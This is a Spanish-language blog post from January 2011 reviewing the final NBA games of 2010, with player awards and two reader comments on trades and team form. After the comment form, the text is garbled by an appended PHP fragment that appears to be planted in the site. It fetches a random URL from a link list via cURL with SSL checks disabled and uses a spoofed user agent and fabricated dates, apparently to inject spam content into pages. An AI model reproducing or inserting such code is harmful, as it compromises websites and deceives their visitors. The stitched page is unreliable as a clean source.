La Crónica (31/12/10): Últimos partidos del 2010

01 de January de 2011 por txusma

No nos pidáis grandes crónicas ni explicaciones exhaustivas que hoy es Año Nuevo. De hecho, a saber que estaréis pensando de un tio que a las 11h30 está sentado delante del ordenador el primer día del año. Tranquilizaos. Las circunstancias especiales de este año me sirven como atenuantes.

Y vayamos al tema rápidamente. Unos mermados Celtics encadenaron la segunda derrota consecutiva, esta vez frente a los Hornets (83-81). Las bajas de Rondo y Garnett fueron demasiado para los verdes. En cambio, los Lakers se impusieron a los Sixers (98-102). El último partido de 2010 fue un partido muy disputado resuelto en parte gracias a los 33 puntos de Bryant. ¿Me lo parece a mi o los Sixers están jugando mucho mejor sin Iguodala?

Chicago y Oklahoma también vencieron. Los primeros a los Nets (81-90) y suman su 12ª victoria en 14 partidos. Los segundos a Atlanta (94-103) de la mano de Durant y Westbrook. El base consiguió un triple-doble no exento de polémica porque la última asistencia (la 10ª) la consiguión con el partido decidido y los Hawks esperando ya el final del partido, algo que no hizo mucha gracia a los halcones.

Y finiquitando del todo, victorias de Indiana (86-95 a los Wizards), de Houston (105-114 a los Raptors, con Calderon rozando el triple doble) , de Golden State (96-95 a Charlotte) y de Phoenix (75-92 sobre los Pistons).

PREMIOS

MVP: Para la pareja Durant-Westbrook. el primero anotó 33 puntos a los que sumó 4 rebotes y 3 asistencias. El segundo consiguió un triple doble de 23 puntos, 10 rebotes y 10 asistencias. Imparables.

Rookie: John Wall vuelve poco a poco a recuperar la forma. Anoche 25 puntos y 4 asistencias. Lástima de sus 7 pérdidas. Paul George gozó de minutos en Indiana y los aprovechó con 13 puntos, 7 rebotes y 5 robos.

Sorpresa: DeRozan principalmente pero como ya se lleva un premio vamos a destacar a Chase Budinger. 22 puntos (8 de 10), 5 rebotes y 4 asistencias en 24 minutos.

Decepción: 4 de 16 y 6 pérdidas. No se puede decir que Andre Blatche tuviera una gran actuación anoche.

Mayor esfuezo en vano: Explotó Demar DeRozan y lo hizo a lo grande. ¡37 puntazos! Lástima que no sirvieran para llevarse el triunfo.

Comenta

2 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Soy de los Suns, pero haría una petición para que dejen salir a Nash a un equipo con opciones, un Jameer Nelson, por el y rondas de draft, o Fisher y Blake o algo lo que sea.

    Un crack como él no se puede quedar sin anillo, ya era jodido lo de Stockton pero Nash da más pena porque es el solo, no hay malone

      Citar

  2. Denise dice:
    #2

    Estuve viendo el Lakers-Sixers, a pesar de los cacareos de la jodida suegra (entre otros/as) que no me dejaba escuchar los comentarios y no me dejaba concentrarme.
    Los Lakers se dejan llevar desesperadamente, si fuese fan angelino estaría indignadísimo con la actitud del equipo ( y de Phil). Cuando querían se ponían a 10-12 puntos con suma facilidad, y de repente empiezan a tocarse los cataplines, los Sixers se vienen arriba y si llegan a meter los 2 triples que lanzaron al final ganan el partido. Creo que ya toca una buena bronca por parte de Buss a todos, incluido a Phil que está viendo como le remontan el partido y ni se inmuta, y tras las 3 palizas, no estaba el partido para hacer pruebas, deberían de haberlo ganado contundentemente.
    Turner tiene calidad pero está muy verde. Intentaría traspasar a alguién por algún jugador con más tiro exterior, un killer, que es lo que le hace falta a este equipo. Los sixers tienen a tres jugadores (Iguodala, Turner y Young) cortados por el mismo patrón, no sé, un Monta Ellis o O.J. Mayo no le vendría nada mal al equipo y deshacerse de Iguodala o Turner.
    Si DeRozan tuviera tiro exterior, estaríamos hablando de una estrella de la liga.
    TMac y sus Pistons volvieron a la realidad tras su victoria vs Celtics, y sobre los Suns, no sé por qué no le dan bola a Childress.
    Sin Rondo y Garnett, está claro que los Celtics pierden la mitad de su potencial.
    Partidazo de Boozer ante unos Nets igual o más malos que los del año pasado. Favors otro jugador verdísimo.
    Los Hawks necesitarían un traspaso, Bibby es un vago de coj…, que se retire ya si no le interesa correr y jugar al basket, y deberían quitarse de en medio el contratazo de Jo Johnson antes de que se lesione o su rendimiento decaiga. Todavía están a tiempo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>